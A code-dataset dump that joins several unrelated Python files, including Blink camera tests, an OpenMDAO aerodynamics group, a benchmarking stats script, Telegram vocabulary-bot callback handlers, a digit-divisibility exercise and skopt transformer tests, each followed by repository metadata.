self.assertFalse(self.blink.sync["test"].get_network_info())
self.assertFalse(self.blink.sync["test"].available)
def test_check_new_videos_startup(self, mock_resp):
"""Test that check_new_videos does not block startup."""
sync_module = self.blink.sync["test"]
self.blink.last_refresh = None
self.assertFalse(sync_module.check_new_videos())
def test_check_new_videos(self, mock_resp):
"""Test recent video response."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 0
self.assertEqual(sync_module.motion, {})
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(
sync_module.last_record["foo"],
{"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"},
)
self.assertEqual(sync_module.motion, {"foo": True})
mock_resp.return_value = {"media": []}
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
self.assertEqual(
sync_module.last_record["foo"],
{"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"},
)
def test_check_new_videos_old_date(self, mock_resp):
"""Test videos return response with old date."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1970-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
def test_check_no_motion_if_not_armed(self, mock_resp):
"""Test that motion detection is not set if module unarmed."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": True})
sync_module.network_info = {"network": {"armed": False}}
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
def test_check_multiple_videos(self, mock_resp):
"""Test motion found even with multiple videos."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1970-01-01T00:00:00+00:00",
},
{
"device_name": "foo",
"media": "/bar/foo.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
},
{
"device_name": "foo",
"media": "/foobar.mp4",
"created_at": "1970-01-01T00:00:01+00:00",
},
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": True})
expected_result = {
"foo": {"clip": "/bar/foo.mp4", "time": "1990-01-01T00:00:00+00:00"}
}
self.assertEqual(sync_module.last_record, expected_result)
def test_check_new_videos_failed(self, mock_resp):
"""Test method when response is unexpected."""
mock_resp.side_effect = [None, "just a string", {}]
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
def test_sync_start(self, mock_resp):
"""Test sync start function."""
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].name, "test")
self.assertEqual(self.blink.sync["test"].sync_id, 1234)
self.assertEqual(self.blink.sync["test"].network_id, 5678)
self.assertEqual(self.blink.sync["test"].serial, "12345678")
self.assertEqual(self.blink.sync["test"].status, "foobar")
def test_unexpected_summary(self, mock_resp):
"""Test unexpected summary response."""
self.mock_start[0] = None
mock_resp.side_effect = self.mock_start
self.assertFalse(self.blink.sync["test"].start())
def test_summary_with_no_network_id(self, mock_resp):
"""Test handling of bad summary."""
self.mock_start[0]["syncmodule"] = None
mock_resp.side_effect = self.mock_start
self.assertFalse(self.blink.sync["test"].start())
def test_summary_with_only_network_id(self, mock_resp):
"""Test handling of sparse summary."""
self.mock_start[0]["syncmodule"] = {"network_id": 8675309}
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].network_id, 8675309)
def test_unexpected_camera_info(self, mock_resp):
"""Test unexpected camera info response."""
self.blink.sync["test"].cameras["foo"] = None
self.mock_start[5] = None
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].cameras, {"foo": None})
def test_missing_camera_info(self, mock_resp):
"""Test missing key from camera info response."""
self.blink.sync["test"].cameras["foo"] = None
self.mock_start[5] = {}
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].cameras, {"foo": None})
def test_sync_attributes(self, mock_resp):
"""Test sync attributes."""
self.assertEqual(self.blink.sync["test"].attributes["name"], "test")
self.assertEqual(self.blink.sync["test"].attributes["network_id"], "1234")
def test_owl_start(self, mock_resp):
"""Test owl camera instantiation."""
response = {
"name": "foo",
"id": 2,
"serial": "foobar123",
"enabled": True,
"network_id": 1,
"thumbnail": "/foo/bar",
}
self.blink.last_refresh = None
self.blink.homescreen = {"owls": [response]}
owl = BlinkOwl(self.blink, "foo", 1234, response)
self.assertTrue(owl.start())
self.assertTrue("foo" in owl.cameras)
self.assertEqual(owl.cameras["foo"].__class__, BlinkCameraMini)
| 2.578125 | 3 |
dymos/examples/min_time_climb/aero/aero.py | naylor-b/dymos | 0 | 5532 | from __future__ import absolute_import
import numpy as np
from openmdao.api import Group
from .dynamic_pressure_comp import DynamicPressureComp
from .lift_drag_force_comp import LiftDragForceComp
from .cd0_comp import CD0Comp
from .kappa_comp import KappaComp
from .cla_comp import CLaComp
from .cl_comp import CLComp
from .cd_comp import CDComp
from .mach_comp import MachComp
class AeroGroup(Group):
"""
The purpose of the AeroGroup is to compute the aerodynamic forces on the
aircraft in the body frame.
Parameters
----------
v : float
air-relative velocity (m/s)
sos : float
local speed of sound (m/s)
rho : float
atmospheric density (kg/m**3)
alpha : float
angle of attack (rad)
S : float
aerodynamic reference area (m**2)
"""
def initialize(self):
self.options.declare('num_nodes', types=int,
desc='Number of nodes to be evaluated in the RHS')
def setup(self):
nn = self.options['num_nodes']
self.add_subsystem(name='mach_comp',
subsys=MachComp(num_nodes=nn),
promotes_inputs=['v', 'sos'],
promotes_outputs=['mach'])
self.add_subsystem(name='cd0_comp',
subsys=CD0Comp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['CD0'])
self.add_subsystem(name='kappa_comp',
subsys=KappaComp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['kappa'])
self.add_subsystem(name='cla_comp',
subsys=CLaComp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['CLa'])
self.add_subsystem(name='CL_comp',
subsys=CLComp(num_nodes=nn),
promotes_inputs=['alpha', 'CLa'],
promotes_outputs=['CL'])
self.add_subsystem(name='CD_comp',
subsys=CDComp(num_nodes=nn),
promotes_inputs=['CD0', 'alpha', 'CLa', 'kappa'],
promotes_outputs=['CD'])
self.add_subsystem(name='q_comp',
subsys=DynamicPressureComp(num_nodes=nn),
promotes_inputs=['rho', 'v'],
promotes_outputs=['q'])
self.add_subsystem(name='lift_drag_force_comp',
subsys=LiftDragForceComp(num_nodes=nn),
promotes_inputs=['CL', 'CD', 'q', 'S'],
promotes_outputs=['f_lift', 'f_drag'])
| 2.3125 | 2 |
stats.py | jakeb1996/SBS | 0 | 5533 | import matplotlib.pyplot as plt
import argparse, csv, numpy, time, os, re
def main(resultsFile, toolName):
filesToCalc = []
toolNames = []
if os.path.isfile(resultsFile):
# the user must have defined an exact file to plot
filesToCalc.append(resultsFile)
toolNames.append(toolName)
else:
# check if there are multiple files matching the criteria
dir = (os.sep).join(resultsFile.split(os.sep)[:-1])
fileNameStart = resultsFile.split(os.sep)[-1]
for (dirpath, dirnames, filenames) in os.walk(dir):
for filename in filenames:
reMatch = re.search('%s_((aggregate|system)|(\d)+)\\b' % fileNameStart, filename)
if bool(reMatch):
filesToCalc.append(os.path.join(dirpath, filename))
toolNames.append('%s %s' %(toolName, reMatch.group(1).title()))
# start plotting
i = 0
while i < len(filesToCalc):
stat(filesToCalc[i], toolNames[i])
i = i + 1
def stat(resultsFile, toolName):
print 'Running for: %s\n' % toolName
TIME_ELAPSED = []
TIME_GAPS = []
config = {
'data-type-default' : int
}
# the aggregate functions to perform on each set. each is a function name.
# user-defined functions at bottom of file
stats = [len, min, q1, median, mean, q3, max, std]
measurements = {
# measurement configurations must appear in the order of the associated CSV columns
# --- sample ---
# 'stat_name' : {
# ['data-type' : float,]
# 'data' : [],
# 'title' : 'measurement title'
# },
# --- end sample ---
### START CHILD PROCESS STATS ###
'time' : {
'data' : [],
'data-type' : float,
'title' : 'Time'
},
'num_threads' : {
'data' : [],
'title' : 'Number of Threads'
},
'cpu_percent' : {
'data' : [],
'data-type' : float,
'title' : 'CPU Utilisation'
},
'mem_rss' : {
'data' : [],
'data-type' : float,
'title' : 'Resident Set Size (RSS) Memory Utilisation'
},
'mem_vms' : {
'data' : [],
'title' : 'Virtual Memory Size (VMS) Memory Utilisation'
},
'io_read_count' : {
'data' : [],
'title' : 'Disk IO Read Count'
},
'io_read_bytes' : {
'data' : [],
'title' : 'Disk IO Read Volume'
},
'io_write_count' : {
'data' : [],
'title' : 'Disk IO Write Count'
},
'io_write_bytes' : {
'data' : [],
'title' : 'Disk IO Write Volume'
},
'child_process_count' : {
'data' : [],
'title' : 'Child Process Count'
},
### START SYSTEM STATS ###
# if the stat was defined above, then don't define it again
'mem_used' : {
'data' : [],
'data-type' : float,
'title' : 'Physical Memory Used (megabytes)'
},
'mem_avai' : {
'data' : [],
'data-type' : float,
'title' : 'Physical Memory Available (megabytes)',
},
'process_count' : {
'data' : [],
'title' : 'Process Count'
}
}
# due to dictionaries not being in order, we need to know the order the data appears and
# match it with the associated plot configuration above.
headerOrder = []
# put all the times in a list
timeRecords = []
with open(resultsFile, 'r') as fcsv:
dataCsv = csv.reader(fcsv, delimiter=',')
# Set the headerOrder and remove the time column header
headerOrder = dataCsv.next()
firstTime = None
for row in dataCsv:
# Elapsed time
timeRecords.append(float(row[0]))
TIME_ELAPSED.append(float(row[0]) - float(timeRecords[0]))
if firstTime == False:
TIME_GAPS.append(float(row[0]) - measurements['time']['data'][-1])
i = 0 # skip zero as its the time (as above)
for measurement in headerOrder:
if 'data-type' in measurements[measurement]:
measurements[measurement]['data'].append(measurements[measurement]['data-type'](row[i]))
else:
measurements[measurement]['data'].append(config['data-type-default'](row[i]))
i += 1
firstTime = False
if len(timeRecords) == 0:
print 'No data recorded in %s.\nExiting.\n\n' % resultsFile
return 0
resultsFileName = '%s_stats.csv' % resultsFile
with open(resultsFileName, 'w') as scsv:
print 'Writing to file: %s' % resultsFileName
# write headers line
scsv.write('measurement,%s\n' % ','.join(map(funcName, stats)))
for measurement in headerOrder:
line = '%s' % measurement
for stat in stats:
line = ('%s,%s' % (line, stat(measurements[measurement]['data'])))
scsv.write('%s\n' % line)
# now, because the time gaps were calculated separately, run the stats on them tool
# messy, I know. sorry!
line = '%s' % 'time_gaps'
for stat in stats:
line = ('%s,%s' % (line, stat(TIME_GAPS)))
scsv.write('%s\n' % line)
# write start and end time
scsv.write('start_time,%s,"%s"\nend_time,%s,"%s"\ntime_elapsed,%s,sec,%s,min' % (timeRecords[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[0])), timeRecords[-1], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[-1])), (timeRecords[-1] - timeRecords[0]), ((timeRecords[-1] - timeRecords[0]) / 60)))
print '\nFinished.'
def q1(seq):
return numpy.percentile(seq, 25)
def median(seq):
return numpy.percentile(seq, 50)
def mean(seq):
return sum(seq) / len(seq)
def q3(seq):
return numpy.percentile(seq, 75)
def std(seq):
return numpy.std(seq)
def funcName(func):
return func.__name__
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Plotter for the Software Benchmarking Script')
parser.add_argument('-f', help='Results file as input (in csv format)')
parser.add_argument('-t', help='Name of tool', default=None)
parser.add_argument('--wincntxmnu', help='Indicates SBS stats was launched from the Windows context menu. See README for help.', action='store_true')
args = parser.parse_args()
# Not used
#if args.wincntxmnu:
# args.t = raw_input('Enter the plot prefix: ')
main(args.f, args.t)
| 2.859375 | 3 |
callback_handlers.py | andrey18106/vocabulary_bot | 0 | 5534 | <filename>callback_handlers.py
# -*- coding: utf-8 -*-
# ===== Default imports =====
import asyncio
import logging
# ===== External libs imports =====
from aiogram import Bot, Dispatcher, types
from aiogram.dispatcher import FSMContext
# ===== Local imports =====
from analytics import BotAnalytics
from db_manager import DbManager
from lang_manager import LangManager
from markups_manager import MarkupManager
from states.Dictionary import DictionaryQuizState, DictionaryState, DictionaryEditWordState, DictionarySearchWordState
from states.Mailing import AdminMailingState
import pagination
class VocabularyBotCallbackHandler:
"""Class for Vocabulary Bot callback handlers"""
def __init__(self, db_manager: DbManager, lang_manager: LangManager, markup_manager: MarkupManager,
analytics: BotAnalytics, dispatcher: Dispatcher, bot: Bot):
self.db = db_manager
self.lang = lang_manager
self.markup = markup_manager
self.analytics = analytics
self.dp = dispatcher
self.bot = bot
self.__init_handlers()
def __init_handlers(self):
# CALLBACK HANDLER FOR USER LANGUAGE SETTINGS
@self.dp.callback_query_handler(lambda query: query.data.startswith('lang_setting_'))
@self.analytics.callback_metric
async def language_settings_callback_handler(query: types.CallbackQuery):
"""Handle selecting preferred interface language"""
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_lang = query['data'][-2:]
if selected_lang != user_lang:
self.db.set_user_lang(query['from']['id'], selected_lang)
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('LANG_SETTINGS', 'SUCCESS', selected_lang),
reply_markup=self.markup.get_main_menu_markup(selected_lang))
await query.answer()
else:
await query.answer(self.lang.get_page_text('LANG_SETTINGS', 'ERROR', user_lang), show_alert=True)
@self.dp.callback_query_handler(lambda query: query.data.startswith('help_question_'))
@self.analytics.callback_metric
async def help_callback_handler(query: types.CallbackQuery):
"""Handle HELP page question buttons"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
question = query['data']
await query.message.edit_text(self.lang.get_page_text("HELP", question, user_lang))
await query.message.edit_reply_markup(self.markup.get_help_back_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data == 'back_to_help')
@self.analytics.callback_metric
async def back_to_help_callback_handler(query: types.CallbackQuery):
"""Handle HELP page question back button"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
await query.message.edit_text(self.lang.get_page_text("HELP", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_help_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('settings_'))
@self.analytics.callback_metric
async def settings_page_callback_handler(query: types.CallbackQuery):
"""Handle SETTINGS page buttons"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
page = query['data'][9:]
if page == 'interface':
await query.message.edit_text(self.lang.get_page_text("LANG_SETTINGS", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_lang_settings_markup(user_lang))
await query.answer()
elif page == 'newsletters':
await query.message.edit_text(self.lang.get_page_text("NEWSLETTER_SETTINGS", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_news_settings_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('news_setting_'))
@self.analytics.callback_metric
async def language_settings_callback_handler(query: types.CallbackQuery):
"""Newsletters settings"""
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_option = query['data'][13:]
user_mailings = self.db.get_user_mailings(query['from']['id'])
mailings_settings = ['disable', 'important', 'all']
if mailings_settings[user_mailings] != selected_option:
if selected_option == 'all' and user_mailings != 2:
self.db.set_user_mailings(query['from']['id'], 2)
elif selected_option == 'important' and user_mailings != 1:
self.db.set_user_mailings(query['from']['id'], 1)
elif selected_option == 'disable' and user_mailings != 0:
self.db.set_user_mailings(query['from']['id'], 0)
await query.message.delete()
await query.message.answer(self.lang.get_page_text("NEWSLETTER_SETTINGS", "SUCCESS", user_lang))
else:
await query.answer(self.lang.get_page_text('NEWSLETTER_SETTINGS', 'ALREADY_SET', user_lang),
show_alert=True)
async def _send_dictionary_page(message: types.Message, user_id: int, user_lang: str, from_lang: str,
to_lang: str, state: FSMContext):
current_state = {
'current_page': 0,
'from_lang': from_lang,
'to_lang': to_lang
}
paginator = getattr(pagination, 'dictionary'.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
user_id,
current_page=current_state)
await message.answer(text=self.lang.get_page_text('DICTIONARY', 'TEXT', user_lang),
reply_markup=self.markup.get_dictionary_markup(user_lang))
await message.answer(text=paginator.first_page(user_lang), reply_markup=paginator.get_reply_markup())
async with state.proxy() as data:
data['curr_pagination_page'] = current_state
await DictionaryState.dictionary.set()
@self.dp.callback_query_handler(lambda query: query.data.startswith('dictionary_'), state="*")
@self.analytics.callback_fsm_metric
async def dictionary_list_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_dict_pairs = query.data[11:].split('_')
from_lang = selected_dict_pairs[0]
to_lang = selected_dict_pairs[1]
await query.message.delete()
await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state)
# PAGINATION
@self.dp.callback_query_handler(lambda query: query.data.startswith('first_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_first_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[6:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_first():
await query.message.edit_text(text=paginator.first_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('prev_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_prev_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_first():
await query.message.edit_text(text=paginator.prev_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('next_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_next_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_last():
await query.message.edit_text(text=paginator.next_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('last_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_last_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_last():
await query.message.edit_text(text=paginator.last_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data == 'profile_referral_link')
@self.analytics.callback_metric
async def profile_referral_link_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
await query.message.answer(self.lang.get_user_referral_link_page(query['from']['id'], user_lang))
await query.message.edit_reply_markup(None)
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('mailings_'))
@self.analytics.callback_metric
async def admin_mailings_new_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query['data'][9:]
if action == 'new':
await AdminMailingState.message.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('MAILINGS', 'NEW', user_lang),
reply_markup=self.markup.get_cancel_markup())
elif action == 'schedule_list':
await query.answer()
# QUIZ CALLBACKS
@self.dp.callback_query_handler(lambda query: query.data == 'quiz_start', state="*")
@self.analytics.callback_fsm_metric
async def quiz_start_callback_handler(query: types.CallbackQuery, state: FSMContext):
await query.answer()
await query.message.delete()
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
from_lang = data['curr_pagination_page']['from_lang']
to_lang = data['curr_pagination_page']['to_lang']
quiz_data = self.db.get_user_quiz_data(query['from']['id'], from_lang, to_lang, 10)
await DictionaryQuizState.user_answers.set()
async with state.proxy() as data:
data['quiz_results'] = []
data['quiz_data'] = quiz_data
data['index'] = 1
question = f"{data['index']}/{len(data['quiz_data'])} " + \
self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format(quiz_data[0]['word'])
await self.bot.send_poll(chat_id=query['from']['id'],
question=question,
options=quiz_data[0]['options'],
correct_option_id=quiz_data[0]['options'].index(quiz_data[0]['answer']),
type='quiz',
reply_markup=self.markup.get_quiz_next_markup(user_lang))
@self.dp.callback_query_handler(state=DictionaryQuizState.user_answers)
@self.analytics.callback_fsm_metric
async def quiz_next_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
if query.message.poll.total_voter_count == 1:
await query.answer()
await query.message.delete()
async with state.proxy() as data:
curr_q_index = data['index']
quiz_result = {
'word': data['quiz_data'][curr_q_index - 1]['word'],
'selected_option': query.message.poll.options.index(
list(filter(lambda item: item.voter_count == 1,
query.message.poll.options))[0]),
'correct_option': query.message.poll.correct_option_id,
'options': list(map(lambda item: dict(item), query.message.poll.options))
}
data['quiz_results'].append(quiz_result)
if curr_q_index < len(data['quiz_data']) - 1:
data['index'] = curr_q_index + 1
question = f"{data['index']}/{len(data['quiz_data'])} "
else:
question = f"{len(data['quiz_data'])}/{len(data['quiz_data'])} "
await DictionaryQuizState.finish.set()
question += self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format(
data['quiz_data'][curr_q_index]['word'])
await self.bot.send_poll(chat_id=query['from']['id'],
question=question,
options=data['quiz_data'][curr_q_index]['options'],
correct_option_id=data['quiz_data'][curr_q_index]['options'].index(
data['quiz_data'][curr_q_index]['answer']),
type='quiz',
reply_markup=self.markup.get_quiz_next_markup(user_lang)
if curr_q_index != len(data['quiz_data']) - 1 else
self.markup.get_quiz_finish_markup(user_lang))
else:
await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang),
show_alert=True)
@self.dp.callback_query_handler(state=DictionaryQuizState.finish)
@self.analytics.callback_fsm_metric
async def quiz_finish_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
if query.message.poll.total_voter_count == 1:
await query.answer()
await query.message.delete()
async with state.proxy() as data:
quiz_result = {
'word': data['quiz_data'][data['index']]['word'],
'selected_option': query.message.poll.options.index(
list(filter(lambda item: item.voter_count == 1,
query.message.poll.options))[0]),
'correct_option': query.message.poll.correct_option_id,
'options': list(map(lambda item: dict(item), query.message.poll.options))
}
data['quiz_results'].append(quiz_result)
await query.message.answer(self.lang.get_page_text('QUIZ', 'FINISH', user_lang))
await query.message.answer(self.lang.get_quiz_results_page(data['quiz_results'], user_lang),
parse_mode='Markdown')
last_pagination_page = data['curr_pagination_page']
await state.finish()
await DictionaryState.dictionary.set()
async with state.proxy() as data:
data['curr_pagination_page'] = last_pagination_page
else:
await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang),
show_alert=True)
@self.dp.callback_query_handler(state=DictionarySearchWordState.search_query)
@self.analytics.callback_fsm_metric
async def search_word_actions_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query.data[10:]
if action == 'add':
async with state.proxy() as data:
new_word_string = data['search_query']
new_word_translation = data['translation']
from_lang = data['curr_pagination_page']['from_lang']
to_lang = data['curr_pagination_page']['to_lang']
self.db.add_user_word(new_word_string, new_word_translation, query['from']['id'], from_lang,
to_lang)
await query.message.edit_text(self.lang.get_page_text('ADD_WORD', 'SUCCESSFUL_ADDED', user_lang))
await state.finish()
await asyncio.sleep(1)
await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state)
elif action == 'find_another':
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('FIND_WORD', 'WELCOME_TEXT', user_lang),
reply_markup=self.markup.get_cancel_markup())
@self.dp.callback_query_handler(state=DictionaryEditWordState.search_query)
@self.analytics.callback_metric
async def edit_word_actions_callback_handler(query: types.CallbackQuery):
user_lang = self.lang.parse_user_lang(query['from']['id'])
action = query.data[10:]
if action == 'string':
await DictionaryEditWordState.new_word_string.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_STRING', user_lang),
reply_markup=self.markup.get_cancel_markup())
elif action == 'translation':
await DictionaryEditWordState.new_word_translation.set()
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_TRANSLATION', user_lang),
reply_markup=self.markup.get_cancel_markup())
| 2.09375 | 2 |
1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/06_Nested-Loops/02.Exercise-06-Special-Numbers.py | karolinanikolova/SoftUni-Software-Engineering | 0 | 5535 | # 6. Специални числа
# Да се напише програма, която чете едно цяло число N, въведено от потребителя, и генерира всички възможни "специални"
# числа от 1111 до 9999. За да бъде “специално” едно число, то трябва да отговаря на следното условие:
# • N да се дели на всяка една от неговите цифри без остатък.
# Пример: при N = 16, 2418 е специално число:
# • 16 / 2 = 8 без остатък
# • 16 / 4 = 4 без остатък
# • 16 / 1 = 16 без остатък
# • 16 / 8 = 2 без остатък
N = int(input())
for number in range(1111, 9999 + 1):
is_number_special = True
number_as_string = str(number)
# Could also write for index, digit in enumerate(number_as_string): but since we don't need the index we don't need enumerate.
for digit in number_as_string:
if int(digit) == 0 or N % int(digit) != 0:
is_number_special = False
break
if is_number_special:
print(f'{number_as_string}', end = ' ')
| 3.953125 | 4 |
skopt/tests/test_transformers.py | sqbl/scikit-optimize | 0 | 5536 | import pytest
import numbers
import numpy as np
from numpy.testing import assert_raises
from numpy.testing import assert_array_equal
from numpy.testing import assert_equal
from numpy.testing import assert_raises_regex
from skopt.space import LogN, Normalize
@pytest.mark.fast_test
def test_logn2_integer():
transformer = LogN(2)
for X in range(2, 31):
X_orig = transformer.inverse_transform(transformer.transform(X))
assert_array_equal(int(np.round(X_orig)), X)
@pytest.mark.fast_test
def test_logn10_integer():
transformer = LogN(2)
for X in range(2, 31):
X_orig = transformer.inverse_transform(transformer.transform(X))
assert_array_equal(int(np.round(X_orig)), X)
@pytest.mark.fast_test
def test_normalize_integer():
transformer = Normalize(1, 20, is_int=True)
assert transformer.transform(19.8) == 1.0
assert transformer.transform(20.2) == 1.0
assert transformer.transform(1.2) == 0.0
assert transformer.transform(0.9) == 0.0
assert_raises(ValueError, transformer.transform, 20.6)
assert_raises(ValueError, transformer.transform, 0.4)
assert transformer.inverse_transform(0.99) == 20
assert transformer.inverse_transform(0.01) == 1
assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8)
assert_raises(ValueError, transformer.transform, 0. - 1e-8)
@pytest.mark.fast_test
def test_normalize():
transformer = Normalize(1, 20, is_int=False)
assert transformer.transform(20.) == 1.0
assert transformer.transform(1.) == 0.0
assert_raises(ValueError, transformer.transform, 20. + 1e-7)
assert_raises(ValueError, transformer.transform, 1.0 - 1e-7)
assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8)
assert_raises(ValueError, transformer.transform, 0. - 1e-8)
| 2.390625 | 2 |
tokenization_numerical.py | dspoka/mnm | 1 | 5537 | <gh_stars>1-10
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
